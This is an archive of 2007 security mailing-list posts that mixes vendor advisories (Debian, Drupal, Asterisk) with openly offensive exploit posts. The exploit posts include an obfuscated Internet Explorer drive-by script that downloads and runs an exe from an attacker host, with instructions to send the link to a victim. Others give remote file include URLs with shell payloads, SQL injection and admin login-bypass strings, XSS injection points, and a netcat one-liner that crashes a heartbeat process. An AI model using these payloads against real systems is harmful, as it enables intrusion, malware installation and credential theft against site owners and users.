Re: Exploit In Internet Explorer
[EMAIL PROTECTED] wrote: > Discovred By : Hasadya Raed "Discovred" as in "found in a web page with some dodgy script in it"? This exploit (though not in this precise form) is common as muck in them thar int-duh-net tubes at the moment... You can't mean "discovered" as in "first found through unique personal research/investigation/etc" as this exploit has been publicly disclosed since April 2006, I think (and privately used previously?): http://www.milw0rm.com/exploits/2052 and again, in a more elaborate "multiple dodgy ActiveX control target" version shortly thereafter: http://www.milw0rm.com/exploits/2164 > Now You Can To Download Exe Files And To Run Without Msgs : Oh, and did I mention patched since 11 April 2006: http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx So probably not that effective if what you want is an assured "fire an forget" remote IE exploit... Regards, Nick FitzGerald
RE: Exploit In Internet Explorer
I get the browser warning bar: "This web site wants to run the following add-on: 'Microsoft Data Access - Remote Data Services Dat...' from 'Microsoft Corporation'. If you trust the web site and the add-on and want to allow it to run, click here..." Looks like a message to me. Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.eweek.com/cheap_hack/ Contributing Editor, PC Magazine [EMAIL PROTECTED] -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Sunday, July 29, 2007 4:58 AM To: bugtraq@securityfocus.com Subject: Exploit In Internet Explorer Discovred By : Hasadya Raed Contact : [EMAIL PROTECTED] - Israel --- Now You Can To Download Exe Files And To Run Without Msgs : Exploit : var dc=document.write; var sc=String.fromCharCode; var exe="http://www.Attacker.com/sever.exe";; dc(sc(60,115,99,114,105,112,116,62,118,97,114,32,97,105,108,105,97,110,4 4,122,104,97,110,44,99,109,100,115,115,59,97,105,108,105,97,110,61,34) + exe + sc(34,59,122,104,97,110,61,34,119,105,110,46,101,120,101,34,59,99,109,10 0,115,115,61,34,99,109,100,46,101,120,101,34,59,116,114,121,123,118,97,1 14,32,97,100,111,61,40,100,111,99,117,109,101,110,116,46,99,114,101,97,1 16,101,69,108,101,109,101,110,116,40,34,111,98,106,101,99,116,34,41,41,5 9,118,97,114,32,100,61,49,59,97,100,111,46,115,101,116,65,116,116,114,10 5,98,117,116,101,40,34,99,108,97,115,115,105,100,34,44,34,99,108,115,105 ,100,58,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49,49,68,48,45,57,56,5 1,65,45,48,48,67,48,52,70,67,50,57,69,51,54,34,41,59,118,97,114,32,101,6 1,49,59,118,97,114,32,120,109,108,61,97,100,111,46,67,114,101,97,116,101 ,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,7 6,72,84,84,80,34,44,34,34,41,59,118,97,114,32,102,61,49,59,118,97,114,32 ,108,110,61,34,65,100,111,34,59,118,97,114,32,1 08,122,110,61,34,100,98,46,83,116,34,59,118,97,114,32,97,110,61,34,114,1 01,97,109,34,59,118,97,114,32,103,61,49,59,118,97,114,32,97,115,61,97,10 0,111,46,99,114,101,97,116,101,111,98,106,101,99,116,40,108,110,43,108,1 22,110,43,97,110,44,34,34,41,59,118,97,114,32,104,61,49,59,120,109,108,4 6,79,112,101,110,40,34,71,69,84,34,44,97,105,108,105,97,110,44,48,41,59, 120,109,108,46,83,101,110,100,40,41,59,97,115,46,116,121,112,101,61,49,5 9,118,97,114,32,110,61,49,59,97,115,46,111,112,101,110,40,41,59,97,115,4 6,119,114,105,116,101,40,120,109,108,46,114,101,115,112,111,110,115,101, 66,111,100,121,41,59,97,115,46,115,97,118,101,116,111,102,105,108,101,40 ,122,104,97,110,44,50,41,59,97,115,46,99,108,111,115,101,40,41,59,118,97 ,114,32,115,104,101,108,108,61,97,100,111,46,99,114,101,97,116,101,111,9 8,106,101,99,116,40,34,83,104,101,108,108,46,65,112,112,108,105,99,97,11 6,105,111,110,34,44,34,34,41,59,115,104,101,108,108,46,83,104,101,108,10 8,69,120,101,99,117,116,101,40,122,104,97,110,44,34,3 4,44,34,34,44,34,111,112,101,110,34,44,48,41,59,115,104,101,108,108,46,8 3,104,101,108,108,69,120,101,99,117,116,101,40,99,109,100,115,115,44,34, 32,47,99,32,100,101,108,32,47,83,32,47,81,32,47,70,32,34,43,122,104,97,1 10,44,34,34,44,34,111,112,101,110,34,44,48,41,59,125,99,97,116,99,104,40 ,101,41,123,125,59,60,47,115,99,114,105,112,116,62)); ;By Fox TeaM - Save As Html File , And Send The Link To Victim - By Hasadya Raed - Israel
Re: Exploit In Internet Explorer
[EMAIL PROTECTED] wrote: > Discovred By : Hasadya Raed > Contact : [EMAIL PROTECTED] - Israel > --- > Now You Can To Download Exe Files And To Run Without Msgs : > > Exploit : [bla bla bla] That's old, man... already recognized by all security software and protected against, as far as I know. signature.asc Description: OpenPGP digital signature
RFI ====> vBulletin v3.6.5
By Hasadya Raed Contact : [EMAIL PROTECTED] - Israel Greetz : -Fairoz- --- vBulletin v3.6.5 Dork : "Powered by vBulletin v3.6.5. Copyright ©2000 - 2007 " --- Exploits : Http://WWW.Victim.Com/vb/includes/functions.php?classfile=[Shell-Attack] Http://WWW.Victim.Com/vb/includes/functions_cron.php?nextitem=[Shell-Attack] Http://WWW.Victim.Com/vb/includes/functions_forumdisplay.php?specialtemplates=[Shell-Attack] Discovred By Hasadya Raed Have A Good Time
Exploit In Internet Explorer
Discovred By : Hasadya Raed Contact : [EMAIL PROTECTED] - Israel --- Now You Can To Download Exe Files And To Run Without Msgs : Exploit : var dc=document.write; var sc=String.fromCharCode; var exe="http://www.Attacker.com/sever.exe";; dc(sc(60,115,99,114,105,112,116,62,118,97,114,32,97,105,108,105,97,110,44,122,104,97,110,44,99,109,100,115,115,59,97,105,108,105,97,110,61,34) + exe + sc(34,59,122,104,97,110,61,34,119,105,110,46,101,120,101,34,59,99,109,100,115,115,61,34,99,109,100,46,101,120,101,34,59,116,114,121,123,118,97,114,32,97,100,111,61,40,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,111,98,106,101,99,116,34,41,41,59,118,97,114,32,100,61,49,59,97,100,111,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,99,108,97,115,115,105,100,34,44,34,99,108,115,105,100,58,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,48,67,48,52,70,67,50,57,69,51,54,34,41,59,118,97,114,32,101,61,49,59,118,97,114,32,120,109,108,61,97,100,111,46,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,44,34,34,41,59,118,97,114,32,102,61,49,59,118,97,114,32,108,110,61,34,65,100,111,34,59,118,97,114,32,1 08,122,110,61,34,100,98,46,83,116,34,59,118,97,114,32,97,110,61,34,114,101,97,109,34,59,118,97,114,32,103,61,49,59,118,97,114,32,97,115,61,97,100,111,46,99,114,101,97,116,101,111,98,106,101,99,116,40,108,110,43,108,122,110,43,97,110,44,34,34,41,59,118,97,114,32,104,61,49,59,120,109,108,46,79,112,101,110,40,34,71,69,84,34,44,97,105,108,105,97,110,44,48,41,59,120,109,108,46,83,101,110,100,40,41,59,97,115,46,116,121,112,101,61,49,59,118,97,114,32,110,61,49,59,97,115,46,111,112,101,110,40,41,59,97,115,46,119,114,105,116,101,40,120,109,108,46,114,101,115,112,111,110,115,101,66,111,100,121,41,59,97,115,46,115,97,118,101,116,111,102,105,108,101,40,122,104,97,110,44,50,41,59,97,115,46,99,108,111,115,101,40,41,59,118,97,114,32,115,104,101,108,108,61,97,100,111,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110,34,44,34,34,41,59,115,104,101,108,108,46,83,104,101,108,108,69,120,101,99,117,116,101,40,122,104,97,110,44,34,3 4,44,34,34,44,34,111,112,101,110,34,44,48,41,59,115,104,101,108,108,46,83,104,101,108,108,69,120,101,99,117,116,101,40,99,109,100,115,115,44,34,32,47,99,32,100,101,108,32,47,83,32,47,81,32,47,70,32,34,43,122,104,97,110,44,34,34,44,34,111,112,101,110,34,44,48,41,59,125,99,97,116,99,104,40,101,41,123,125,59,60,47,115,99,114,105,112,116,62)); ;By Fox TeaM - Save As Html File , And Send The Link To Victim - By Hasadya Raed - Israel
BellaBiblio Admin Login Bypass
BellaBiblio Admin Login Bypass SCRIPT: BellaBiblio DOWNLOAD: http://www.jemjabella.co.uk/scripts/BellaBiblio.zip AUTHOR: ilker kandemir Bug in;(admin.php) if (isset($_COOKIE['bellabiblio'])) { if ($_COOKIE['bellabiblio'] == md5($admin_name.$admin_pass.$secret)) { if (isset($_GET['ap'])) $page = $_GET['ap']; else $page = ""; EXPLOIT: Set your cookie: bellabiblio=administrator http:/site.com/admin.php And you have full admin access
Dora Emlak Script v1.0 (tr) Admin Login ByPass
# Dora Emlak Script v1.0 (tr) Admin Login ByPass # ilker kandemir # Download: http://aspindir.com/goster/5027 # TnX.: Ajann, Dumenci, H0tTurk, Str0ke # # # # # # # # # # # # # # # # # # # # # # # # # # Bug in ../dora/administartor/yonetim/patron/default.asp <% cookFirstLevel = Session("FirstLevelSecurity") 'Ilk Güvenlik Session cookSecondLevel = Session("SecondLevelSecurity") 'Ikinci Güvenlik Session queryProc = Request.QueryString("Proc") 'Querystring Tanimi strPageURL = Replace("/" & Request.ServerVariables("URL"),"//","/") 'Bu Sayfa Adresi strFirstPass = "sifre1" strSecondPass = "sifre2" If fixWord(queryProc) = "" Then 'Eger Query Bos Ise (Normal Sayfa Acilisiysa) If cookFirstLevel <> 1 and cookSecondLevel <> 1 Then 'Eger 1. ve 2. Seviye Sessionlar 1den Farkliysa %> # # # # # # # # # # # # # # # # # # # # # # # # # # Admin Login Panel: /administartor/yonetim/patron/admin.asp # First Login Pass: sifre1 # Second Login Pass: sifre2 # # # # # # # # # # # # # # # # # # # # # # # # #
phpVoter v0.6 Remote File Include Vulnerability
# # # # # # # # # # # # # # # # # # # # # # # # # # phpVoter v0.6 Remote File Include Vulnerability # ilker kandemir # Download: http://jxdevelopment.com/downloads/phpscripts/phpvoter-0_6.zip # TnX.: Ajann, Dumenci, H0tTurk, Str0ke # # # # # # # # # # # # # # # # # # # # # # # # # # Exploit: includes/functions.inc.php?sitepath=http://shell.txt? # # # # # # # # # # # # # # # # # # # # # # # # #
Phorm v3.0 Remote File Upload Vulnerability
# # # # # # # # # # # # # # # # # # # # # # # # # # Phorm v3.0 Remote File Upload Vulnerability # ilker kandemir # Download: ftp://ftp.holotech.net/phorm/phorm.zip # TnX.: Ajann, Dumenci, H0tTurk, Str0ke # # # # # # # # # # # # # # # # # # # # # # # # # # Exploit: http://[site]/[phorm_path]/lib/fileupload.php [+]=>> upload your shell.php # http://[site]/[phorm_path]/files/phpshell.php # # # # # # # # # # # # # # # # # # # # # # # # #
Madoa Poll v1.1 Remote File Include Vulnerabilities
# Madoa Poll v1.1 Remote File Include Vulnerabilities # ilker kandemir # info: */ Her$ey Vatan icin /* # Download: http://www.finnermark.se/madoa/Madoa_poll1_1.zip # TnX.: Ajann, Dumenci, H0tTurk, Str0ke # Bug: require ($Madoa . "config.php"); # Exploit: index.php?Madoa=http://sheel.txt? vote.php?Madoa=http://sheel.txt? admin.php?Madoa=http://shell.txt?
phpWebFileManager v0.5 (PN_PathPrefix) Remote File Include Vulnerability
--- MEFISTO PreSents... Script: phpWebFileManager v0.5 Script Download: http://platon.sk/projects/download.php?id=2 Contact: ilker Kandemir Code: require_once $PN_PathPrefix . 'functions.inc.php'; << it's not defined --- Exploit: index.php?PN_PathPrefix=http://attacker.txt? --- Tnx:H0tturk,Ajann,Dumenci,Str0ke
RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability
--- MEFISTO PreSents... Script: RIG Image Gallery Script Download: http://sourceforge.net/project/showfiles.php?group_id=54367 Contact: ilker Kandemir Code: require_once(rig_check_src_file($dir_abs_src . "entry_point.php")); --- Exploit: check_entry.php?dir_abs_src=http://attacker.php? --- Tnx:H0tturk,Ajann,Dumenci,Str0ke
[SECURITY] [DSA 1342-1] New xfs packages fix privilege escalation
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1342-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff July 30th, 2007 http://www.debian.org/security/faq - -- Package: xfs Vulnerability : race condition Problem-Type : local Debian-specific: no CVE ID : CVE-2007-3103 It was discovered that a race condition in the init.d script of the X Font Server allows the modification of file permissions of arbitrary files if the local administrator can be tricked into restarting the X font server. For the oldstable distribution (sarge) xfs is present as part of the monolithic xfree86 package. A fix will be provided along with a future security update. For the stable distribution (etch) this problem has been fixed in version 1.0.1-6. For the unstable distribution (sid) this problem has been fixed in version 1.0.4-2. We recommend that you upgrade your xfs package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6.dsc Size/MD5 checksum: 794 938a05eb2b1638fc49b4d7101084c69b http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6.diff.gz Size/MD5 checksum:28440 0eeacd5783c66b937eaa1dbde6145401 http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1.orig.tar.gz Size/MD5 checksum: 174623 32e8b6b24ec3d4c0de11d81061640cc2 Alpha architecture: http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6_alpha.deb Size/MD5 checksum:75520 0becb7909f5d9df1621d1a8b153eab2b AMD64 architecture: http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6_amd64.deb Size/MD5 checksum:65224 632e1a2416a91e079fe16f19f8c18f37 ARM architecture: http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6_arm.deb Size/MD5 checksum:61330 41a50afe7ca54708028f8929ef9f62a8 HP Precision architecture: http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6_hppa.deb Size/MD5 checksum:68312 31b1450c324283337298f0671491eddd Intel IA-32 architecture: http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6_i386.deb Size/MD5 checksum:56856 40191532dd37541d09a9ff62bf9e6189 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6_ia64.deb Size/MD5 checksum:97348 31aacc8828c1dc532db8d5b630de5f5c Big endian MIPS architecture: http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6_mips.deb Size/MD5 checksum:69112 c0797a23074512e31edeef83a57817b5 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6_mipsel.deb Size/MD5 checksum:69032 3a44f04fd9e3f4b84fd03889bcebeb56 PowerPC architecture: http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6_powerpc.deb Size/MD5 checksum:64512 00d156e38ef0cf5f5257ae90cef496a2 IBM S/390 architecture: http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6_s390.deb Size/MD5 checksum:67514 710d362f9183b98f817736e466c89d35 Sun Sparc architecture: http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6_sparc.deb Size/MD5 checksum:57382 8a32daa22fd7630ff4101e21a4cfaf7d These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: [EMAIL PROTECTED] Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFGrjNiXm3vHE4uyloRAhvlAJ4nmQhLJ6wDlPAERwZzjpYpxkZ16wCfYlXi PaqM+Ogp8Y8Ad+BI11/VjtU= =f8Uy -END PGP SIGNATURE-
[DRUPAL-SA-2007-017] Drupal 5.2 fixes multiple CSRF vulnerabilities
Drupal security advisory DRUPAL-SA-2007-017 Project: Drupal core Version: 5.x Date: 2007-July-26 Security risk:Moderately critical Exploitable from: Remote Vulnerability:Multiple cross site request forgeries Description --- Several parts in Drupal core are not protected against cross site request forgeries [1] due to inproper use of the Forms API, or by taking action solely on GET requests. Malicious users are able to delete comments and content revisions and disable menu items by enticing a privileged users to visit certain URLs while the victim is logged-in to the targeted site. Versions affected - - Drupal 5.x versions before Drupal 5.2 Solution - If you are running Drupal 5.x then upgrade to Drupal 5.2. http://ftp.drupal.org/files/projects/drupal-5.2.tar.gz Drupal 4.7.x is not affected. If you are unable to upgrade immediately, you can apply a patch to secure your installation until you are able to do a proper upgrade. - To patch Drupal 5.1 use http://drupal.org/files/sa-2007-017/SA-2007-017-5.1.patch. Please note that the patches only contain changes related to this advisory, and do not fix bugs that were solved in 5.1. Reported by --- Konstantin Käfer reported the menu issue. The Drupal security team. Contact --- The security contact for Drupal can be reached at security at drupal.org or using the form at http://drupal.org/contact. // Heine Deelstra, on behalf of the Drupal Security Team. signature.asc Description: OpenPGP digital signature
[DRUPAL-SA-2007-018] Drupal 4.7.7 and 5.2 fix multiple cross site scripting vulnerabilities
Drupal security advisory DRUPAL-SA-2007-018 Project: Drupal core Version: 4.7.x, 5.x Date: 2007-July-26 Security risk:Moderately critical Exploitable from: Remote Vulnerability:Multiple cross site scripting vulnerabilities Description --- Some server variables are not escaped consistently. When a malicious user is able to entice a victim to visit a specially crafted link or webpage, arbitrary HTML and script code can be injected and executed in the context of the victim's session on the targeted website. Custom content type names are not escaped consistently. A malicious user with the 'administer content types' permission would be able to inject and execute arbitrary HTML and script code on the website. Revoking the 'administer content types' permission provides an immediate workaround. Both vulnerabilities are know as cross site scripting. Versions affected - - Drupal 4.7.x versions before Drupal 4.7.7 - Drupal 5.x versions before Drupal 5.2 Solution - If you are running Drupal 4.7.x then upgrade to Drupal 4.7.7. http://ftp.drupal.org/pub/drupal/files/projects/drupal-4.7.7.tar.gz - If you are running Drupal 5.x then upgrade to Drupal 5.2. http://ftp.drupal.org/pub/drupal/files/projects/drupal-5.2.tar.gz If you are unable to upgrade immediately, you can apply a patch to secure your installation until you are able to do a proper upgrade. - To patch Drupal 4.7.6 use http://drupal.org/files/sa-2007-018/SA-2007-018-4.7.6.patch. - To patch Drupal 5.1 use http://drupal.org/files/sa-2007-018/SA-2007-018-5.1.patch. Please note that the patches only contain changes related to this advisory, and do not fix bugs that were solved in 4.7.7 or 5.2. Important note -- The configuration file settings.php is one of the files containing vulnerable code. It is therefore critical to replace all of your sites' settings.php files in subdirectories of sites with the new one from the archive. After you have replaced the files, make sure to edit the value of the $db_url variable to be identical to the value in your old settings.php. This is the information that determines how Drupal connects to a database. Reported by --- - The server variables issue was reported by David Caylor. - Content type naming issues were reported by Karthik. Thanks -- The security team whishes to thank Dave, Morten Wulff, Brenda Wallace, Fernando Silva, Gerhard Killesreiter, Brandon Bergren, Bart Janssen and Neil Drumm for technical assistance. Contact --- The security contact for Drupal can be reached at security at drupal.org or using the form at http://drupal.org/contact. signature.asc Description: OpenPGP digital signature
FLEA-2007-0036-1 vim vim-minimal gvim
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Foresight Linux Essential Advisory: 2007-0036-1 Published: 2007-07-30 Rating: Moderate Updated Versions: vim=/[EMAIL PROTECTED]:1-devel//1/7.1.044-1-1 vim-minimal=/[EMAIL PROTECTED]:1-devel//1/7.1.044-1-1 gvim=/[EMAIL PROTECTED]:1-devel//1/7.1.044-1-1 group-dist=/[EMAIL PROTECTED]:1-devel//1/1.3.2-0.6-5 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2953 https://issues.rpath.com/browse/RPL-1595 Description: Previous versions of the vim package are vulnerable to a user-assisted attack in which vim may execute arbitrary code when helptags is run on data that has been maliciously crafted. - --- Copyright 2007 Foresight Linux Project This file is distributed under the terms of the MIT License. A copy is available at http://www.foresightlinux.org/permanent/mit-license.html -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.4 (GNU/Linux) iQIVAwUBRq4WkNfwEn07iAtZAQIdHA//RuhxXhkOlpo5yMN4jBOC9nq91pe+oB1q NxZLgzaarAJYOj3Cx8KS/M/slDhnePAIxZBl14TVr2SKtHHiNMEA788lkq0Dlw1u j1GpCff0S5lR0BwpvhEQOA8nMCCS91Jb3sXFom5Z7d9qSZ5Ne4Iwq9fk/h6TRgFk 3I0HVMXPRY2AVxAF1OU3/aPiYDqr/fJyurRaYrkHSzMu9eUm6qZ9aBgzJ3SB0CDR 6IvwsBInhs9jRSqX0gK8TGsg53dxDZ9nbTEM+GstUqWYO21kTutSjcKGq1SKlW9z Db+t4OBtl6i20K5Qpk1cfEmJPBUmDg6yXVeWt1iKIy9dv9NHHvz4LSmsMmSpdbqn LyWwTP0BfEV5hHGwwDy8IJx66IRImnOTjRUiuOIMq/+B9jnQZCoZk/9XhxmNeElT dCfRnfFNeM4/Vp+i3d2E7yvkjSZlG5XVLA5Ha+VARrWti/6J/RWXcYRwvhO+QNHz 7Wm5Q8Tza/1is0EmhnejhYolMU3FiPGOnTj5KC92vn2wF1OiS400NKdSbGX8qogi ihp15IOl4SiPRuUZRM2HA5Ru4MLK5A2G7R8NgWc0CUmGfuzeqCCTFu7c72qcT5AW gb4YKlAvwEeyA+bxZKhOgo5Nir1A4rbTPkMaIXrORyC5RZASdoEiQeUPMFkEmlEH bJlpkcoT2+c= =rMyd -END PGP SIGNATURE-
wolioCMS SQL Injection
# wolioCMS - SQL Injection and Bypass Administrator Login # Vendor: http://www.buton.web.id/member.php?member=anon # Download : http://www.buton.web.id/download/woliocms.zip # Found By : k1tk4t - k1tk4t[4t]newhack.org # Location : Indonesia -- #newhack[dot]org @irc.dal.net Exploit ini berhasil jika 'magic_quotes_gpc = off' file; /common.php bug at line73; $sql="select * from pages where pages_id='".$_GET["id"]."' "; /admin/index.php bug at line28; $sql="select * from member where member_email='$uid' and member_password='$pwd' and member_active='yes' "; Variable $uid tidak terfilter dengan baik, sehingga bisa di manipulasi oleh user exploit; SQL Injection http://localhost/_woliocms/member.php?member=admin&act=page&id='/**/UNION/**/ALL/**/SELECT/**/null,null,concat(member_email,'-',member_password),null,null,null,null,null,null,null/**/FROM/**/member/* Bypass Administrator Login http://localhost/_woliocms/admin/ Login Page Email; '/**/UNION/**/ALL/**/SELECT/**/member_id,member_email,member_password,member_realname,member_urlname,member_themes,member_groups_id,member_register_date,member_active,member_activation_code/**/FROM/**/member/* Password; Blank[just kliklogin] Thanks; str0ke xoron [www.xoron.biz] y3dips [y3d1ps.blogspot.com] -newhack[dot]org|staff- mR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX --- all member newhack[ot]org --- all member echo.or.id --- tidak lupa untuk anavrin[semangat kerja bro], dan ical yang baru sembuh
ASA-2007-018: Resource exhaustion vulnerability in IAX2 channel driver
Asterisk Project Security Advisory - ASA-2007-018 ++ | Product | Asterisk | |+---| | Summary | Resource Exhaustion vulnerability in IAX2 channel | || driver| |+---| | Nature of Advisory | Denial of Service | |+---| | Susceptibility | Remote Unauthenticated Sessions | |+---| | Severity | Moderate | |+---| | Exploits Known | No| |+---| |Reported On | July 19, 2007 | |+---| |Reported By | Russell Bryant, Digium, Inc. <[EMAIL PROTECTED]> | |+---| | Posted On | July 23, 2007 | |+---| | Last Updated On | July 25, 2007 | |+---| | Advisory Contact | Russell Bryant <[EMAIL PROTECTED]> | |+---| | CVE Name | | ++ ++ | Description | The IAX2 channel driver in Asterisk is vulnerable to a | | | Denial of Service attack when configured to allow| | | unauthenticated calls. An attacker can send a flood of | | | NEW packets for valid extensions to the server to| | | initiate calls as the unauthenticated user. This will| | | cause resources on the Asterisk system to get allocated | | | that will never go away. Furthermore, the IAX2 channel | | | driver will be stuck trying to reschedule| | | retransmissions for each of these fake calls forever.| | | This can very quickly bring down a system and the only | | | way to recover is to restart Asterisk. | | | | | | Detailed Explanation:| | | | | | Within the last few months, we made some changes to | | | chan_iax2 to combat the abuse of this module for traffic | | | amplification attacks. Unfortunately, this has caused an | | | unintended side effect. | | | | | | The summary of the change to combat traffic | | | amplification is this. Once you start the PBX on the | | | Asterisk channel, it will begin receiving frames to be | | | sent back out to the network. We delayed this from | | | happening until a 3-way handshake has occurred to help | | | ensure that we are talking to the IP address the | | | messages appear to be coming from. | | | | | | When chan_iax2 accepts an unauthenticated call, it | | | immediately creates the ast_channel for the call.| | | However, since the 3-way handshake has not been | | | completed, the PBX is not started on this channel. | | | | | | Later, when the maximum number of retries have been | | | exceeded on responses to this NEW, the code tries to | | | hang up the call. Now, it has 2 ways to do this, | | | depending on if there is an ast_channel related to this | | | I
TS-2007-001-0: BlueCat Networks Adonis Linux-HA heartbeat DoS Vulnerability
Template Security Security Advisory --- BlueCat Networks Adonis Linux-HA heartbeat DoS Vulnerability Date: 2007-07-29 Advisory ID: TS-2007-001-0 Vendor: BlueCat Networks, http://www.bluecatnetworks.com/ Revision: 0 Contents Summary Software Version Details Impact Exploit Workarounds Obtaining Patched Software Credits Revision History Summary --- Template Security has discovered a serious Denial of Service (DoS) vulnerability in the BlueCat Networks Adonis DNS/DHCP Appliance. When XHA is configured to place two Adonis servers in an active-passive pair to provide high availability, a remote attacker can transmit a single UDP datagram to crash the heartbeat control process. This can be used for example to create an active/active condition in the cluster pair. Software Version Adonis version 5.0.2.8 was tested, and XHA was configured using the Proteus IPAM appliance. It is possible any version of Adonis using heartbeat version 1.2.4 or earlier is vulnerable. Details --- XHA on Adonis uses the heartbeat software from the Linux-HA project (http://www.linux-ha.org/). On the version of Adonis we tested, heartbeat version 1.2.3 is used. This version is vulnerable to a well-known remote DoS attack which was announced on 2006-08-13: http://www.linux-ha.org/_cache/SecurityIssues__sec03.txt Impact -- Successful exploitation of the vulnerability will result in a DoS condition affecting critical DNS and DHCP services. Exploit --- In this example the XHA cluster is composed of: node-1: 192.168.1.12 node-2: 192.168.1.13 VIP:192.168.1.11 A remote attacker can perform the following to crash the heartbeat control process on node-1: $ perl -e 'print "###\n2147483647heart attack:%%%\n"' | nc -u 192.168.1.12 694 If node-1 is the active node in the cluster, node-2 will take over the VIP and the cluster will be in an active/active condition. Other scenarios are possible, such as crashing the control process on the passive node to prevent it from being able to assume the active role in a failure condition. Note that the iptables configuration on Adonis does not block packets to 694/udp; there is an explicit policy to permit port 694/udp from any to any in the INPUT and OUTPUT chain. To verify this, you can login as root on the appliance and view the firewall configuration script: # grep 694 /usr/local/bluecat/doFirewall iptables -A INPUT -p udp --dport 694 -j ACCEPT iptables -A OUTPUT -p udp --dport 694 -j ACCEPT $IP6TABLES -A INPUT -p udp --dport 694 -j ACCEPT $IP6TABLES -A OUTPUT -p udp --dport 694 -j ACCEPT Workarounds --- The attack can be prevented by blocking packets to 694/udp. This can be performed at a firewall and by modifying the iptables configuration on the Adonis appliances. Appropriate anti-spoofing policies must also be in place, because an attacker can spoof the source IP address in the UDP datagram. When XHA was configured, iptables rules were configured in /usr/local/bluecat/firewall_rules/localHAFirewallConfig to permit 694/udp to and from the peer node on each appliance. However, these rules have no effect due to the rules mentioned above. And they are also incorrect because they specify source port 694/udp, and the heartbeat packets we observed do not use a fixed source port. One possible workaround which may be used to temporarily prevent the attack is to comment out the 694/udp rules in the firewall startup script then repair the rules in localHAFirewallConfig. However, localHAFirewallConfig can be overwritten by /usr/local/bluecat/configLocalFirewall.sh. Due to this, we recommend that customers do not modify the iptables configuration, and block 694/udp and perform anti-spoofing at a firewall. Obtaining Patched Software -- Contact the vendor. Credits --- forloop discovered that Adonis XHA was using vulnerable heartbeat software, and defaultroute read the heartbeat code to discover the exploit. Both are members of Template Security. Revision History 2007-07-29: Revision 0 released
[EMAIL PROTECTED]
Hello Joomla multiple vulerabilities Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : [EMAIL PROTECTED] Affected Versions 1.0.X -> tested on 1.0.12 and 1.5 maybe affected -> not tested but probebly affected sql injection administrator/popups/pollwindow.php?pollid=1%20union%20select%20password%20from%20jos_users/* Full path Many many in includes/ Examples includes/Cache/Lite/Output.php includes/patTemplate/patTemplate/Stat.php includes/patTemplate/patTemplate/OutputFilter.php includes/patTemplate/patTemplate/OutputCache.php includes/patTemplate/patTemplate/Modifier.php includes/patTemplate/patTemplate/Reader.php includes/patTemplate/patTemplate/TemplateCache.php .. ETC GrEEtZ : DeviL-00 , Dr.ExE , GaCkeR , Sp1deR_Net , Black AttaCk , MiniMan , JareeH BaghdaD , Le Copra; Special GrEEtZ For : MohAjali AnD SoQoR.NeT TeaM AnD MemberS; End of it :) WwW.SoQoR.NeT
[Aria-security] community Cross-site Scripting (XSS)
[Aria-Security] # Tilte: community Cross-site Scripting (XSS) # # # < Author: You_You > # < Software: Commute (The best community) > # < Site Script: http://sourceforge.net/projects/commutese/> proof Of Concept : local/[path]/require/small_head.php?retun=[Xss-script]
E-commerceScripts ALL Apps (Auction Script, Shopping Cart Script and Multi-Vendor E-Shop Script) admin.aspx SQL
_ A R I A - S E C U R I T Y _ Vendor: http://www.e-commercescripts.com/dotnet/ E-commerceScripts ALL Apps (Auction Script, Shopping Cart Script and Multi-Vendor E-Shop Script) admin.aspx SQL Injection Username: anything' OR 'x'='x password: whatever you want ( or anything' OR 'x'='x) Credits: Aria-Security Team http://aria-security.net http://outlaw.aria-security.info [PERSONAL BLOG]
[Aria-security] itcms 0.2 Cross-site Scripting (XSS)
[Aria-Security] # Tilte: itcms 0.2 Cross-site Scripting (XSS) # # # < Author: You_You > # < Software: itcms > # < Site Script:http://sourceforge.net/projects/itcms/ > proof Of Concept : local/[path]/lang-en.php?wndtitle=[Xss-script] local/[path]/menu-ed.php?wndtitle=[Xss-script] local/[path]/titletext-ed.php?wndtitle=[Xss-script]
